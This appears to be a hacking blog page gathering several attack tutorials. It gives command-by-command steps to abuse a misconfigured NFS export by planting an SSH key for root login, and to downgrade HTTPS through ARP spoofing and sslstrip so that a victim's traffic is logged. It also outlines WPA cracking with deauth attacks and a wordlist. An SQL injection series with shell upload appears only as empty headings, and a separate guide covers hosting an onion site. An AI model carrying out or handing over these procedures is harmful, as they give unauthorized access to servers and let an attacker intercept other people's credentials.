Exploit a Misconfigured NFS Server | SSH | RPCbind

What NFS Server is ?

NFS is network file system and it is a client server system that allows client to access shared files over a network. It allows client to mount all directories. We are going to access a file system and import our private ssh key to  authorized key file gain root access via SSH. In the last i will tell how to prevent this this type of attacks on your server.

Let the victim ip is

open terminal and type rpcinfo -p  this will return all the registered RPC programs.

many people get the error that rpcinfo command not found “sudo apt update && sudo apt install rpcbind”

type sudo showmount -e this will return the mount directories.

/ * means root directory
now create a tmp file for mount mkdir /tmp/dir this will create a temporary directory for mount the nfs server, now mount server to temporary directory type command mount -o nolock -t nfs /tmp/dir 

now generate ssh key command ssh-keygen that will create a key in your /home/h0nk3r/.ssh/id_rsa

now import the key command cat /home/h0nk3r/.ssh/id_rsa >> /tmp/dir/root/.ssh/authorized_keys that will send your ssh key to the nfs server to gain access to root via ssh now just umount the shared directory umount /tmp/dir 


Now You can directly connect to the server type command ssh root@ 


If i am the owner of this server i can manage users with group and with the specific privileges and never use the root directory  as mount point.


Sorry if i made any mistake in conceptual or grammatical, as i am not good in English.
Hope you had a nice reading, comming back to hacknews.

Create Your Own DarkWeb site | Onion link | Port Forward | Host on WAN

DarkWeb site with tor on linux

DarkWeb is very usefull to be anonymous you can get you own .onion website and host on wide area network free.
i assume you are using kali linux or parrot sec os open terminal and install tor sudo apt-get install tor after you just need to edit some in configuration file of tor.

open terminal and type cd /etc/tor and than ls for list dir you will see torrc file there that you have to edit

open this file in your favorite text editor and add two lines
HiddenServiceDir /var/lib/tor/hidden_service
HiddenServicePort 80 <Your local IP>:80
Check your local ip with ifconfig 
open your file manager with root and go in /var/lib/tor/hidden_service there you get your website
and boom you done it at last start tor by sudo service tor start and sudo service apache2 start

NOTE:- Now you face a problem that site cant be reach! Here is the solution

Forward your port | Go on Internet

This is just make a connection between your local ip to the internet so you can access your website worldwide
for more about Port forwarding click here
i suggest you to use NGROK for download click  available for all Systems
after Download you just forward your port with ./ngrok http 80 80 for http so you apache server will be on WAN and your onion site can reach it.
after forward your port you see like this

just copy 4f28046d.ngrok.io this link and paste where you put your local ip if you remember above
in file torrc  and save it again and restart tor again and now you can access your apache site with onion site
paste your website here  /var/www  and boom your website is ready for share on social media.


Sorry if i made any mistake in conceptual or grammatical, as i am not good in English.
Hope you had a nice reading, comming back to hacknews.

HTTPS downgrade to HTTP | Bypasss HSTS | SSLStrip | ARP poisoning

Introduction of HSTS, ARP, And sslstrip

HTTP Strict Transport Security (HSTS) is a web security which protects against downgrade of protocols and cookies hijacking. The Address Resolution Protocol (ARP) feature performs a required function in IP routing. ARP finds the hardware address, also known as Media Access Control (MAC) address, of a host from its known IP address. ARP maintains a cache (table) in which MAC addresses are mapped to IP addresses. SSLStrip is a type of MITM force a web browse to stripping https:// URLs and turning them into http:// URLs.

You have to forward IP By IPTables and send a fake arp request Request.


Lets Do it.

MITMF -(Framework for Man-In-The-Middle attacks)

https://github.com/byt3bl33d3r/MITMf  just simple download this Framework from git hub (git clone) or sudo apt-get install mitmf
By just mitmf -h you can go in help section

-i: to specify the interface we want to run the MITM attack trough;
–spoof: to redirect or modify the hijacked traffic;
–apr: to specify that we want to redirect the traffic trough ARP spoofing;
–hsts: to load SSLStrip+ plugin;
–dns: to load a proxy to modify DNS queries;
–gateway: to specify the gateway;
–target:to specify the target.

run mitmf –spoof –arp -i <interface name> –target <target IP> –gateway <gateway IP> –hsts

get the target local ip by netdiscover or scan your local ip by nmap and for gateway ip route, or route –n


Open terminal and forward Ip by echo 1 > /proc/sys/net/ipv4/ip_forward

start arpspoof by arpspoof -i eth0 -t victimip default_gateway_ip

Setting up port redirection using Iptables iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000

finally Launch sslstrip sslstrip –l 10000

now open new terminal  and see results tail -n 50 -f sslstrip.log


Sorry if i made any mistake in conceptual or grammatical, as i am not good in English.

Hope you had a nice reading, comming back to hacknews.

WIFI Hacking Tutorial: Using Aircrack, DeAuth and Wordlists to hack WIFI networks

Our tutorial today will be about WIFI hacking using the DeAuth attack, most useful for hacking WPA/WPA2 networks. It works by aquiring a handshake and decrypting it using a wordlist.
The system used in the tutorial is Kali linux, but it will work for any .deb based system (Debian, Mint, Ubuntu, etc.) and the technique will not be much different for other distributions either.

1: The tutorial is pretty straightforward, and starts out by putting your network adapter in monitor mode using AIRMON-NG.

2: Next we use AIRODUMP-NG to monitor and receive packets. Your network adapter then receives beacons. This means you get a clear view of all the different WIFI networks around you. After this you select the correct BSSID from the list, and the correct channel.

3: Using AIREPLAY-NG and filling in the correct BSSID and channel, we launch a DeAuth attack using a simple command. Then we wait until a so called “handshake” is received.

4: Close all the processes and start cracking the .cap (capture) file. This will be done using a wordlist. The program used for this is AIRCRACK-NG. Any wordlist saved as a .txt file will do. The bigger the wordlist, the more chance you have of cracking it.

Extra: A good wordlist to use is called the RockYou wordlist, wich is available for download here.

Below is a full tutorial video showing you the exact codes and steps in detail, so you will never make a mistake when you carry out your attack!

With credits to Razzor Sharp for his amazing video!

SQL injection tutorial – A step by step guide (4 parts)

Are you interested in learning about hacking? Perhaps you imagined hacking a website and uploading your own custom message to it? Today we want to introduce you to SQL injection. The guide below comes in 4 parts and takes you from beginner to advanced in less than an hour. The final part is about uploading a shell as an image.

Remember, these tutorials are for educational purposes only.

SQL injection tutorial – A step by step guide – Part 1:

SQL injection tutorial – A step by step guide – Part 2:

SQL injection tutorial – A step by step guide – Part 3:

SQL injection tutorial – A step by step guide – Part 4: